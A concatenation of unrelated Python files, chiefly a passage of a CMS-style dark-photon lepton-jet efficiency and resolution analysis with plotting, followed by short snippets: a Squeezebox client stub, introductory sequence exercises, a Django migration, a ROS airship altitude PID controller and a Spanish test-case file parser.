pz=df['gen_p4.fCoordinates.fZ'].content,
energy=df['gen_p4.fCoordinates.fT'].content,
pid=df['gen_pid'].content,
daupid=df['gen_daupid'].content,
dauvx=df['gen_dauvtx.fCoordinates.fX'].content,
dauvy=df['gen_dauvtx.fCoordinates.fY'].content,
dauvz=df['gen_dauvtx.fCoordinates.fZ'].content,
)
genparticles.add_attributes(daurho=np.hypot(genparticles.dauvx, genparticles.dauvy))
is_dpToMu = (genparticles.pid==32)&(genparticles.daupid==13)
dpMu = genparticles[is_dpToMu&(genparticles.daurho<700)&(genparticles.pt>20)&(np.abs(genparticles.eta)<2.4)]
# at least 1 good dpMu
nDpMuGe1 = dpMu.counts>=1
dpMu = dpMu[nDpMuGe1]
leptonjets = JaggedCandidateArray.candidatesfromcounts(
df['pfjet_p4'],
px=df['pfjet_p4.fCoordinates.fX'].content,
py=df['pfjet_p4.fCoordinates.fY'].content,
pz=df['pfjet_p4.fCoordinates.fZ'].content,
energy=df['pfjet_p4.fCoordinates.fT'].content,
)
ljdautype = awkward.fromiter(df['pfjet_pfcand_type'])
npfmu = (ljdautype==3).sum()
ndsa = (ljdautype==8).sum()
isegammajet = (npfmu==0)&(ndsa==0)
ispfmujet = (npfmu>=2)&(ndsa==0)
isdsajet = ndsa>0
label = isegammajet.astype(int)*1+ispfmujet.astype(int)*2+isdsajet.astype(int)*3
leptonjets.add_attributes(label=label)
nmu = ((ljdautype==3)|(ljdautype==8)).sum()
leptonjets.add_attributes(ismutype=(nmu>=2), iseltype=(nmu==0))
ljdaucharge = awkward.fromiter(df['pfjet_pfcand_charge']).sum()
leptonjets.add_attributes(qsum=ljdaucharge)
leptonjets.add_attributes(isneutral=(leptonjets.iseltype | (leptonjets.ismutype&(leptonjets.qsum==0))))
leptonjets = leptonjets[leptonjets.isneutral]
leptonjets = leptonjets[nDpMuGe1]
ljmu = leptonjets[leptonjets.ismutype]
matchidx = dpMu.argmatch(ljmu, deltaRCut=0.4)
dpMu_ = dpMu[ljmu.counts!=0]
matchmask = matchidx[ljmu.counts!=0]!=-1
output['lxy'].fill(dataset=dataset, lxy=dpMu_[matchmask].daurho.flatten(), reco='true')
output['lxy'].fill(dataset=dataset, lxy=dpMu.daurho.flatten(), reco='inclusive')
genpt = dpMu_[matchmask].pt.flatten()
recopt = ljmu[matchidx][ljmu.counts!=0][matchmask].pt.flatten()
output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='(PFMu+DSAMu)-type leptonjet')
ljmu = leptonjets[leptonjets.label==2]
matchidx = dpMu.argmatch(ljmu, deltaRCut=0.4)
dpMu_ = dpMu[ljmu.counts!=0]
matchmask = matchidx[ljmu.counts!=0]!=-1
genpt = dpMu_[matchmask].pt.flatten()
recopt = ljmu[matchidx][ljmu.counts!=0][matchmask].pt.flatten()
output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='PFMu-type leptonjet')
output['lxy-pf'].fill(dataset=dataset, lxy=dpMu_[matchmask].daurho.flatten(), reco='true')
output['lxy-pf'].fill(dataset=dataset, lxy=dpMu.daurho.flatten(), reco='inclusive')
ljmu = leptonjets[leptonjets.label==3]
matchidx = dpMu.argmatch(ljmu, deltaRCut=0.4)
dpMu_ = dpMu[ljmu.counts!=0]
matchmask = matchidx[ljmu.counts!=0]!=-1
genpt = dpMu_[matchmask].pt.flatten()
recopt = ljmu[matchidx][ljmu.counts!=0][matchmask].pt.flatten()
output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='DSAMu-type leptonjet')
output['lxy-dsa'].fill(dataset=dataset, lxy=dpMu_[matchmask].daurho.flatten(), reco='true')
output['lxy-dsa'].fill(dataset=dataset, lxy=dpMu.daurho.flatten(), reco='inclusive')
return output
def postprocess(self, accumulator):
return accumulator
class EGMEffiProcessor(processor.ProcessorABC):
def __init__(self):
dataset_axis = hist.Cat('dataset', 'dataset')
lxy_axis = hist.Bin('lxy', 'lxy [cm]', 100, 0, 250)
reco_axis = hist.Cat('reco', 'reco type')
self._accumulator = processor.dict_accumulator({
'lxy': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'lxy-el': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'lxy-pho': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
})
@property
def accumulator(self):
return self._accumulator
def process(self, df):
output = self.accumulator.identity()
dataset = df['dataset']
genparticles = JaggedCandidateArray.candidatesfromcounts(
df['gen_p4'],
px=df['gen_p4.fCoordinates.fX'].content,
py=df['gen_p4.fCoordinates.fY'].content,
pz=df['gen_p4.fCoordinates.fZ'].content,
energy=df['gen_p4.fCoordinates.fT'].content,
pid=df['gen_pid'].content,
vx=df['gen_vtx.fCoordinates.fX'].content,
vy=df['gen_vtx.fCoordinates.fY'].content,
vz=df['gen_vtx.fCoordinates.fZ'].content,
charge=df['gen_charge'].content,
)
genparticles.add_attributes(rho=np.hypot(genparticles.vx, genparticles.vy))
genel = genparticles[(np.abs(genparticles.pid)==11)&(genparticles.pt>10)&(np.abs(genparticles.eta)<2.4)&(genparticles.rho<250)]
## at least 2 good gen electrons
nelGe2 = genel.counts>=2
genel = genel[nelGe2]
ljsources = JaggedCandidateArray.candidatesfromcounts(
df['ljsource_p4'],
px=df['ljsource_p4.fCoordinates.fX'].content,
py=df['ljsource_p4.fCoordinates.fY'].content,
pz=df['ljsource_p4.fCoordinates.fZ'].content,
energy=df['ljsource_p4.fCoordinates.fT'].content,
pid=df['ljsource_type'].content,
charge=df['ljsource_charge'].content,
)
egms = ljsources[(ljsources.pid==2)|(ljsources.pid==4)][nelGe2]
matchidx = genel.argmatch(egms, deltaRCut=0.3)
genel_ = genel[egms.counts!=0]
matchmask = matchidx[egms.counts!=0]!=-1
output['lxy'].fill(dataset=dataset, lxy=genel_[matchmask].rho.flatten(), reco='true')
output['lxy'].fill(dataset=dataset, lxy=genel.rho.flatten(), reco='inclusive')
egms = ljsources[(ljsources.pid==2)][nelGe2]
matchidx = genel.argmatch(egms, deltaRCut=0.3)
genel_ = genel[egms.counts!=0]
matchmask = matchidx[egms.counts!=0]!=-1
output['lxy-el'].fill(dataset=dataset, lxy=genel_[matchmask].rho.flatten(), reco='true')
output['lxy-el'].fill(dataset=dataset, lxy=genel.rho.flatten(), reco='inclusive')
egms = ljsources[(ljsources.pid==4)][nelGe2]
matchidx = genel.argmatch(egms, deltaRCut=0.3)
genel_ = genel[egms.counts!=0]
matchmask = matchidx[egms.counts!=0]!=-1
output['lxy-pho'].fill(dataset=dataset, lxy=genel_[matchmask].rho.flatten(), reco='true')
output['lxy-pho'].fill(dataset=dataset, lxy=genel.rho.flatten(), reco='inclusive')
return output
def postprocess(self, accumulator):
return accumulator
class EGMLJEffiResoProcessor(processor.ProcessorABC):
def __init__(self):
dataset_axis = hist.Cat('dataset', 'dataset')
lxy_axis = hist.Bin('lxy', 'lxy [cm]', 100, 0, 250)
reso_axis = hist.Bin('reso', '($p_T$(reco)-$p_T$(gen))/$p_T$(gen)', 100, -0.5, 0.5)
reco_axis = hist.Cat('reco', 'reco type')
self._accumulator = processor.dict_accumulator({
'lxy': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'lxy-el': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'lxy-pho': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'reso': hist.Hist('Norm. Frequency/0.01', dataset_axis, reso_axis, reco_axis),
})
@property
def accumulator(self):
return self._accumulator
def process(self, df):
output = self.accumulator.identity()
dataset = df['dataset']
genparticles = JaggedCandidateArray.candidatesfromcounts(
df['gen_p4'],
px=df['gen_p4.fCoordinates.fX'].content,
py=df['gen_p4.fCoordinates.fY'].content,
pz=df['gen_p4.fCoordinates.fZ'].content,
energy=df['gen_p4.fCoordinates.fT'].content,
pid=df['gen_pid'].content,
daupid=df['gen_daupid'].content,
dauvx=df['gen_dauvtx.fCoordinates.fX'].content,
dauvy=df['gen_dauvtx.fCoordinates.fY'].content,
dauvz=df['gen_dauvtx.fCoordinates.fZ'].content,
)
genparticles.add_attributes(daurho=np.hypot(genparticles.dauvx, genparticles.dauvy))
is_dpToEl = (genparticles.pid==32)&(genparticles.daupid==11)
dpEl = genparticles[is_dpToEl&(genparticles.daurho<250)&(genparticles.pt>20)&(np.abs(genparticles.eta)<2.4)]
# at least 1 good dpEl
nDpElGe1 = dpEl.counts>=1
dpEl = dpEl[nDpElGe1]
leptonjets = JaggedCandidateArray.candidatesfromcounts(
df['pfjet_p4'],
px=df['pfjet_p4.fCoordinates.fX'].content,
py=df['pfjet_p4.fCoordinates.fY'].content,
pz=df['pfjet_p4.fCoordinates.fZ'].content,
energy=df['pfjet_p4.fCoordinates.fT'].content,
)
ljdautype = awkward.fromiter(df['pfjet_pfcand_type'])
nel = (ljdautype==2).sum()
npfmu = (ljdautype==3).sum()
ndsa = (ljdautype==8).sum()
isegammajet = (npfmu==0)&(ndsa==0)
iseljet = (isegammajet)&(nel!=0)
ispfmujet = (npfmu>=2)&(ndsa==0)
isdsajet = ndsa>0
label = isegammajet.astype(int)*1+ispfmujet.astype(int)*2+isdsajet.astype(int)*3+iseljet.astype(int)*4
leptonjets.add_attributes(label=label)
nmu = ((ljdautype==3)|(ljdautype==8)).sum()
leptonjets.add_attributes(ismutype=(nmu>=2), iseltype=(nmu==0))
ljdaucharge = awkward.fromiter(df['pfjet_pfcand_charge']).sum()
leptonjets.add_attributes(qsum=ljdaucharge)
leptonjets.add_attributes(isneutral=(leptonjets.iseltype | (leptonjets.ismutype&(leptonjets.qsum==0))))
leptonjets = leptonjets[leptonjets.isneutral]
leptonjets = leptonjets[nDpElGe1]
ljegm = leptonjets[leptonjets.iseltype]
matchidx = dpEl.argmatch(ljegm, deltaRCut=0.4)
dpEl_ = dpEl[ljegm.counts!=0]
matchmask = matchidx[ljegm.counts!=0]!=-1
output['lxy'].fill(dataset=dataset, lxy=dpEl_[matchmask].daurho.flatten(), reco='true')
output['lxy'].fill(dataset=dataset, lxy=dpEl.daurho.flatten(), reco='inclusive')
genpt = dpEl_[matchmask].pt.flatten()
recopt = ljegm[matchidx][ljegm.counts!=0][matchmask].pt.flatten()
output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='EGM-type leptonjet')
ljegm = leptonjets[leptonjets.label==5]
matchidx = dpEl.argmatch(ljegm, deltaRCut=0.4)
dpEl_ = dpEl[ljegm.counts!=0]
matchmask = matchidx[ljegm.counts!=0]!=-1
genpt = dpEl_[matchmask].pt.flatten()
recopt = ljegm[matchidx][ljegm.counts!=0][matchmask].pt.flatten()
output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='Electron-type leptonjet')
output['lxy-el'].fill(dataset=dataset, lxy=dpEl_[matchmask].daurho.flatten(), reco='true')
output['lxy-el'].fill(dataset=dataset, lxy=dpEl.daurho.flatten(), reco='inclusive')
ljegm = leptonjets[leptonjets.label==1]
matchidx = dpEl.argmatch(ljegm, deltaRCut=0.4)
dpEl_ = dpEl[ljegm.counts!=0]
matchmask = matchidx[ljegm.counts!=0]!=-1
genpt = dpEl_[matchmask].pt.flatten()
recopt = ljegm[matchidx][ljegm.counts!=0][matchmask].pt.flatten()
output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='Photon-type leptonjet')
output['lxy-pho'].fill(dataset=dataset, lxy=dpEl_[matchmask].daurho.flatten(), reco='true')
output['lxy-pho'].fill(dataset=dataset, lxy=dpEl.daurho.flatten(), reco='inclusive')
return output
def postprocess(self, accumulator):
return accumulator
if __name__ == "__main__":
import os
from os.path import join, isdir, splitext
reldir = splitext(__file__)[0].replace('_', '/')
outdir = join(os.getenv('FH_BASE'), "Imgs", reldir)
if not isdir(outdir): os.makedirs(outdir)
import re
longdecay = re.compile('^.*_lxy-300$')
# ----------------------------------------------------------
## mu cand efficiency, resolution
output = processor.run_uproot_job(sigDS_2mu2e,
treename='ffNtuplizer/ffNtuple',
processor_instance=MuEffiResoProcessor(),
executor=processor.futures_executor,
executor_args=dict(workers=12, flatten=False),
chunksize=500000,
)
fig, ax = plt.subplots(figsize=(8,6))
hist.plotratio(num=output['lxy'][longdecay].sum('dataset').integrate('reco', 'true'),
denom=output['lxy'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
overflow='over',
error_opts={'marker': 'o',},
ax=ax,
label='PFMu+DSAMu')
hist.plotratio(num=output['lxy-pf'][longdecay].sum('dataset').integrate('reco', 'true'),
denom=output['lxy-pf'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
overflow='over',
error_opts={'marker': 'o', 'color': 'tab:red', 'fillstyle': 'none',},
ax=ax,
clear=False,
label='PFMu')
hist.plotratio(num=output['lxy-dsa'][longdecay].sum('dataset').integrate('reco', 'true'),
denom=output['lxy-dsa'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
overflow='over',
error_opts={'marker': 'o', 'color': 'tab:green', 'fillstyle': 'none',},
ax=ax,
clear=False,
label='DSAMu')
ax.set_ylim([0, 1.05])
ax.set_yticks(np.arange(0, 1.05, 0.1))
ax.set_xticks(np.arange(0, 701, 50))
ax.grid(axis='y', ls='--')
ax.legend()
ax.set_title('[signalMC|2mu2e] leptonjet source - muon candidates (PFMuon+DSAMu) \nreconstruction efficiency vs. gen muon lxy', x=0.0, ha="left")
ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
ax.set_ylabel('Efficiency/7', y=1.0, ha="right")
ax.text( 0.6, 0.6, '$\geqslant$2 gen muons with\n$p_T>10GeV, |\eta|<2.4, vxy<700cm$\n$\Delta R$(gen,reco)<0.3, same charge', transform=ax.transAxes)
fig.savefig(join(outdir, 'mucand-effi-vs-lxy_2mu2e.png'))
fig.savefig(join(outdir, 'mucand-effi-vs-lxy_2mu2e.pdf'))
plt.close(fig)
fig, ax = plt.subplots(figsize=(8,6))
hist.plot1d(output['reso'][longdecay].sum('dataset'), overlay='reco', ax=ax, overflow='all', density=True)
ax.set_title('[signalMC|2mu2e] leptonjet source - muon candidates (PFMuon+DSAMu)\n$p_T$ resolution', x=0, ha='left')
ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
ax.set_ylabel(ax.get_ylabel(), y=1.0, ha="right")
ax.set_xticks(np.arange(-1, 2.01, 0.2))
fig.savefig(join(outdir, 'mucand-ptreso_2mu2e.png'))
fig.savefig(join(outdir, 'mucand-ptreso_2mu2e.pdf'))
plt.close(fig)
# ----------------------------------------------------------
## mu-type leptonjet efficiency, resolution
output = processor.run_uproot_job(sigDS_2mu2e,
treename='ffNtuplizer/ffNtuple',
processor_instance=MuLJEffiResoProcessor(),
executor=processor.futures_executor,
executor_args=dict(workers=12, flatten=False),
chunksize=500000,
)
fig, ax = plt.subplots(figsize=(8,6))
hist.plotratio(num=output['lxy'][longdecay].sum('dataset').integrate('reco', 'true'),
denom=output['lxy'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
overflow='over',
error_opts={'marker': 'o',},
ax=ax,
label='(PFMu+DSAMu)-type leptonjet')
hist.plotratio(num=output['lxy-pf'][longdecay].sum('dataset').integrate('reco', 'true'),
denom=output['lxy-pf'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
overflow='over',
error_opts={'marker': 'o', 'color': 'tab:red', 'fillstyle': 'none',},
ax=ax,
clear=False,
label='PFMu-type leptonjet')
hist.plotratio(num=output['lxy-dsa'][longdecay].sum('dataset').integrate('reco', 'true'),
denom=output['lxy-dsa'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
overflow='over',
error_opts={'marker': 'o', 'color': 'tab:green', 'fillstyle': 'none',},
ax=ax,
clear=False,
label='DSAMu-type leptonjet')
ax.set_ylim([0, 1.05])
ax.set_yticks(np.arange(0, 1.05, 0.1))
ax.set_xticks(np.arange(0, 701, 50))
ax.grid(axis='y', ls='--')
ax.legend()
ax.set_title('[signalMC|2mu2e] mu-type leptonjet\nreconstruction efficiency vs. gen muon lxy', x=0.0, ha="left")
ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
ax.set_ylabel('Efficiency/7', y=1.0, ha="right")
ax.text( 0.6, 0.6, '$\geqslant$1 gen darkphoton(${}$) with\n$p_T>20GeV, |\eta|<2.4, lxy<700cm$\n$\Delta R$(gen,reco)<0.4'.format(r'\rightarrow\mu^+\mu^-'), transform=ax.transAxes)
fig.savefig(join(outdir, 'mulj-effi-vs-lxy_2mu2e.png'))
fig.savefig(join(outdir, 'mulj-effi-vs-lxy_2mu2e.pdf'))
plt.close(fig)
fig, ax = plt.subplots(figsize=(8,6))
hist.plot1d(output['reso'][longdecay].sum('dataset'), overlay='reco', ax=ax, overflow='all', density=True)
ax.set_title('[signalMC|2mu2e] mu-type leptonjet $p_T$ resolution', x=0, ha='left')
ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
ax.set_ylabel(ax.get_ylabel(), y=1.0, ha="right")
ax.set_xticks(np.arange(-1, 2.01, 0.2))
fig.savefig(join(outdir, 'mulj-ptreso_2mu2e.png'))
fig.savefig(join(outdir, 'mulj-ptreso_2mu2e.pdf'))
plt.close(fig)
# ----------------------------------------------------------
## EGM cand efficiency
output = processor.run_uproot_job(sigDS_2mu2e,
treename='ffNtuplizer/ffNtuple',
processor_instance=EGMEffiProcessor(),
executor=processor.futures_executor,
executor_args=dict(workers=12, flatten=False),
chunksize=500000,
)
fig, ax = plt.subplots(figsize=(8,6))
hist.plotratio(num=output['lxy'][longdecay].sum('dataset').integrate('reco', 'true'),
denom=output['lxy'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
overflow='over',
error_opts={'marker': 'o',},
ax=ax,
label='PFElectron+PFPhoton')
hist.plotratio(num=output['lxy-el'][longdecay].sum('dataset').integrate('reco', 'true'),
denom=output['lxy-el'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
overflow='over',
error_opts={'marker': 'o', 'color': 'tab:red', 'fillstyle': 'none',},
ax=ax,
clear=False,
label='PFElectron')
hist.plotratio(num=output['lxy-pho'][longdecay].sum('dataset').integrate('reco', 'true'),
denom=output['lxy-pho'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
overflow='over',
error_opts={'marker': 'o', 'color': 'tab:green', 'fillstyle': 'none',},
ax=ax,
clear=False,
label='PFPhoton')
ax.set_ylim([0, 1.05])
ax.set_yticks(np.arange(0, 1.05, 0.1))
ax.set_xticks(np.arange(0, 251, 25))
ax.grid(axis='y', ls='--')
ax.legend()
ax.set_title('[signalMC|2mu2e] leptonjet source - egamma candidates\n(PFElectron+PFPhoton) reconstruction efficiency vs. gen electron lxy', x=0.0, ha="left")
ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
ax.set_ylabel('Efficiency/2.5', y=1.0, ha="right")
ax.text( 0.6, 0.6, '$\geqslant$2 gen electrons with\n$p_T>10GeV, |\eta|<2.4, vxy<250cm$\n$\Delta R$(gen,reco)<0.3', transform=ax.transAxes)
fig.savefig(join(outdir, 'egmcand-effi-vs-lxy_2mu2e.png'))
fig.savefig(join(outdir, 'egmcand-effi-vs-lxy_2mu2e.pdf'))
plt.close(fig)
# ----------------------------------------------------------
## EGM leptonjet efficiency, resolution
output = processor.run_uproot_job(sigDS_2mu2e,
treename='ffNtuplizer/ffNtuple',
processor_instance=EGMLJEffiResoProcessor(),
executor=processor.futures_executor,
executor_args=dict(workers=12, flatten=False),
chunksize=500000,
)
fig, ax = plt.subplots(figsize=(8,6))
hist.plotratio(num=output['lxy'][longdecay].sum('dataset').integrate('reco', 'true'),
denom=output['lxy'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
overflow='over',
error_opts={'marker': 'o',},
ax=ax,
label='EGM-type leptonjet')
hist.plotratio(num=output['lxy-el'][longdecay].sum('dataset').integrate('reco', 'true'),
denom=output['lxy-el'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
overflow='over',
error_opts={'marker': 'o', 'color': 'tab:red', 'fillstyle': 'none',},
ax=ax,
clear=False,
label='Electron-type leptonjet')
hist.plotratio(num=output['lxy-pho'][longdecay].sum('dataset').integrate('reco', 'true'),
denom=output['lxy-pho'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
overflow='over',
error_opts={'marker': 'o', 'color': 'tab:green', 'fillstyle': 'none',},
ax=ax,
clear=False,
label='Photon-type leptonjet')
ax.set_ylim([0, 1.05])
ax.set_yticks(np.arange(0, 1.05, 0.1))
ax.set_xticks(np.arange(0, 251, 25))
ax.grid(axis='y', ls='--')
ax.legend()
ax.set_title('[signalMC|2mu2e] EGM-type leptonjet\nreconstruction efficiency vs. gen electron lxy', x=0.0, ha="left")
ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
ax.set_ylabel('Efficiency/2.5', y=1.0, ha="right")
ax.text( 0.6, 0.6, '$\geqslant$1 gen darkphoton(${}$) with\n$p_T>20GeV, |\eta|<2.4, lxy<250cm$\n$\Delta R$(gen,reco)<0.4'.format(r'\rightarrow e^+e^-'), transform=ax.transAxes)
fig.savefig(join(outdir, 'egmlj-effi-vs-lxy_2mu2e.png'))
fig.savefig(join(outdir, 'egmlj-effi-vs-lxy_2mu2e.pdf'))
plt.close(fig)
fig, ax = plt.subplots(figsize=(8,6))
hist.plot1d(output['reso'][longdecay].sum('dataset'), overlay='reco', ax=ax, overflow='all', density=True)
ax.set_title('[signalMC|2mu2e] EGM-type leptonjet $p_T$ resolution', x=0, ha='left')
ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
ax.set_ylabel(ax.get_ylabel(), y=1.0, ha="right")
ax.set_xticks(np.arange(-0.5, 0.51, 0.1))
fig.savefig(join(outdir, 'egmlj-ptreso_2mu2e.png'))
fig.savefig(join(outdir, 'egmlj-ptreso_2mu2e.pdf'))
plt.close(fig)
# ----------------------------------------------------------
if args.sync:
webserver = 'wsi@lxplus.cern.ch'
if '/' in reldir:
webdir = f'/eos/user/w/wsi/www/public/firehydrant/{reldir.rsplit("/", 1)[0]}'
cmd = f'rsync -az --exclude ".*" --delete {outdir} --rsync-path="mkdir -p {webdir} && rsync" {webserver}:{webdir}'
else:
webdir = '/eos/user/w/wsi/www/public/firehydrant'
cmd = f'rsync -az --exclude ".*" --delete {outdir} {webserver}:{webdir}'
print(f"--> sync with: {webserver}:{webdir}")
os.system(cmd)
|
mixed_token = "in99"
if mixed_token.isdigit:
eng_pron = 'in'
digit_pron = 'jiu4_jiu5'
spoken_form = eng_pron + '_' + digit_pron
print(spoken_form)
|
import socket
import asyncore
import uuid
import struct
import logging
log = logging.getLogger('slim')
SLIMPORT = 3483 # server listens on tcp, client on udp
WEBPORT = 9000 # webinterface
BUFFERSIZE = 1024 # reading messages in this blocksize
class SlimProto(object):
"""implements the logitech/slimdevices squeezbox media
protocol parsing"""
def __init__(self):
pass
class SlimClient(object):
"""implements the logitech/slimdevices squeezebox media
communication layer"""
def __init__(self, host, port=SLIMPORT):
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
log.debug('connecting to %s:%d' % (host, port))
self._socket.connect((host, port))
def send(self, msg):
"""send a SlimProto message to the server"""
pass
def receive(self, length=None):
"""receive length bytes of data from server,
and return a SlimProto Object with the parsed data"""
pass
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
discover = SlimDiscover()
asyncore.loop(30)
discover.send()
|
# Sequence iteration
stairs = (1, 2, 3, 4, 5, 4, 3, 4, 5, 6, 7)
from operator import getitem
def count_while(s, value, getitem=getitem, len=len):
"""Count the number of occurrences of value in sequence s.
>>> stairs.count(4)
3
>>> count_while(stairs, 4)
3
"""
total, index = 0, 0
while index < len(s):
if getitem(s, index) == value:
total = total + 1
index = index + 1
return total
def count(s, value):
"""Count the number of occurrences of value in sequence s.
>>> count(stairs, 4)
3
"""
total = 0
for elem in s:
if elem == value:
total = total + 1
return total
def count_same(pairs):
"""Count the number of pairs that contain the same value repeated.
>>> pairs = ((1, 2), (2, 2), (2, 3), (4, 4))
>>> count_same(pairs)
2
"""
same_count = 0
for x, y in pairs:
if x == y:
same_count = same_count + 1
return same_count
few = range(-2, 2)
many = range(-2, 50000000)
# List mutation
suits = ['coin', 'string', 'myriad'] # A list literal
suits.pop() # Removes and returns the final element
suits.remove('string') # Removes the first element that equals the argument
suits.append('cup') # Add an element to the end
suits.extend(['sword', 'club']) # Add all elements of a list to the end
suits[2] = 'spade' # Replace an element
suits
suits[0:2] = ['heart', 'diamond'] # Replace a slice
[suit.upper() for suit in suits]
[suit[1:4] for suit in suits if len(suit) == 5]
# Dictionaries
numerals = {'I': 1.0, 'V': 5, 'X': 10}
numerals['X']
numerals['I'] = 1
numerals['L'] = 50
numerals
sum(numerals.values())
dict([(3, 9), (4, 16), (5, 25)])
numerals.get('A', 0)
numerals.get('V', 0)
{x: x*x for x in range(3,6)}
# {[1]: 2}
# {1: [2]}
# {([1], 2): 3}
# {tuple([1, 2]): 3}
# Identity and equality
def ident():
suits = ['heart', 'diamond']
s = suits
t = list(suits)
suits += ['spade', 'club']
t[0] = suits
print(t)
suits.append('Joker')
print(t)
t[0].pop()
print(s)
|
# Generated by Django 3.1.7 on 2021-06-05 11:36
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0007_auto_20210604_1337'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='number_of_children',
),
]
|
#!/usr/bin/env python
## Controls the airship altitude
import rospy
import time
import sys
from geometry_msgs.msg import TransformStamped
from airshippi_vicon.msg import Rotor
#from airshippi_vicon import testmodule
# Global params
P = 90
I = 0.5
D = 0
RATE_HZ = 5 # Hz
VICON_TOPIC = '/vicon/gal_airship/gal_airship'
#VICON_TOPIC = '/vicon/wand_test/wand_test'
class AltitudeController(object):
def __init__(self, z_target=0):
# Variables
self.z_target = z_target
self.z_current = 0
self.pwm_out = 0
self.direction_out = 0
self.new_input = True
self.integral = 0
self.last_error = 0
# Initialise node
rospy.init_node('altitude_controller', anonymous=True)
# Initialise publisher and subscriber
self.pub = rospy.Publisher('altitude_rotor', Rotor, queue_size=1)
rospy.Subscriber(VICON_TOPIC, TransformStamped, self.callback, queue_size=1)
def callback(self, data):
# Get vertical position
self.z_current = data.transform.translation.z
# Get error
error = self.z_target - self.z_current
# Get integral
self.integral += error/RATE_HZ
# Get derivative
derivative = (error - self.last_error)*RATE_HZ
# Get raw motor value
raw_pwm = -(P*error + I*self.integral + D*derivative)
# Save pwm and direction
self.direction_out = int(raw_pwm > 0)
raw_pwm = abs(raw_pwm)
self.pwm_out = max(0, min(raw_pwm, 255))
# Note the new input
self.new_input = True
# Update error
self.last_error = error
# Log it
#rospy.loginfo(rospy.get_caller_id() + '\nAltitude: %s, Target: %s, Thruster value: %s', z, self.z_target, self.pwm_out)
def run(self):
# Set rate
rate = rospy.Rate(RATE_HZ)
while not rospy.is_shutdown():
# Construct Rotor and publish it only if a new input was received in the time since the last publish
if self.new_input:
rotor = Rotor(pwm=self.pwm_out, direction=self.direction_out)
self.new_input = False
else:
rotor = Rotor(pwm=0, direction=0)
self.pub.publish(rotor)
rospy.loginfo("\nAltitude: %s, Target: %s, Thruster value: %s", self.z_current, self.z_target, rotor)
rate.sleep()
def usage():
return "%s z_target"%sys.argv[0]
if __name__ == '__main__':
if len(sys.argv) == 2:
z_target = float(sys.argv[1])
else:
print(usage())
sys.exit(1)
print("Setting desired altitude to %s"%(z_target))
ac = AltitudeController(z_target)
ac.run()
|
"""Estos dos primeros métiodos van a permitir abrir un fichero de texto y extraer de él los casos test en forma de
matriz de 3 dimensiones [Primera dimensión: lista de los atributos del ítem. Segunda dimensión: lista de ítems de un día.
Tercera dimensión: lista de listas de cada día. Los casos test están escritos en la siguiente forma:
-------- día X --------
atributo1, atributo2, atributo3 (Nombre del. Ejemplo: Nombre, Caducidad, Calidad)
atributo1, atributo2, atributo3 (del primer ítem)
atributo1, atributo2, atributo3 (del segundo ítem y sucesivamente)
[*SALTO DE LÍNEA*]
---------día X+1--------
[...]
"""
def abrirFichero(rutaAccesoFichero):
try:
if not isinstance(rutaAccesoFichero, str):
raise ValueError
return open(rutaAccesoFichero, 'r')
except FileNotFoundError:
print("Fichero no encontrado")
return []
except ValueError:
print("El nombre del fichero ha de ser un string")
return []
def accesoCasosTexttest(matrizCasosTest, rutaAccesoFichero):
fichero = abrirFichero(rutaAccesoFichero)
if fichero != []:
matrizCasosTest = []
numeroPropiedadesItem = 0
for linea in fichero:
if "day" in linea:
casosTestDia = []
elif linea == "\n":
matrizCasosTest.append(casosTestDia)
elif "name" in linea:
numeroPropiedadesItem = len(linea.split(','))
else:
item = linea.rstrip().rsplit(',', maxsplit=numeroPropiedadesItem - 1)
casosTestDia.append(item)
fichero.close()
return matrizCasosTest
def crearFicheroCasosTest(ficheroVolcadoCasosTest, matrizCasosTest):
try:
if not isinstance(ficheroVolcadoCasosTest, str):
raise ValueError
stdout = open(ficheroVolcadoCasosTest, 'w')
except ValueError:
print("La ruta de acceso al fichero ha de ser un string")
else:
for (offset, casosTestDia) in enumerate(matrizCasosTest):
stdout.write('-' * 5 + " Dia %d: " % offset + '-' * 5 + '\n')
for item in casosTestDia:
stdout.write(','.join(item) + '\n')
stdout.close()
def mostrarCasosTest(matrizCasosTest):
for (offset, casosTestDia) in enumerate(matrizCasosTest):
print('-' * 5 + " Dia %d: " % offset + '-' * 5)
for item in casosTestDia:
print(item)
if __name__ == "__main__":
rutaAccesoFichero = "./stdout.gr"
# rutaAccesoFichero = "stdout_bug_conjured.gr"
matrizCasosTest = []
matrizCasosTest = accesoCasosTexttest(matrizCasosTest, rutaAccesoFichero)
mostrarCasosTest(matrizCasosTest)
ficheroVolcadoCasosTest = "./stdout.txt"
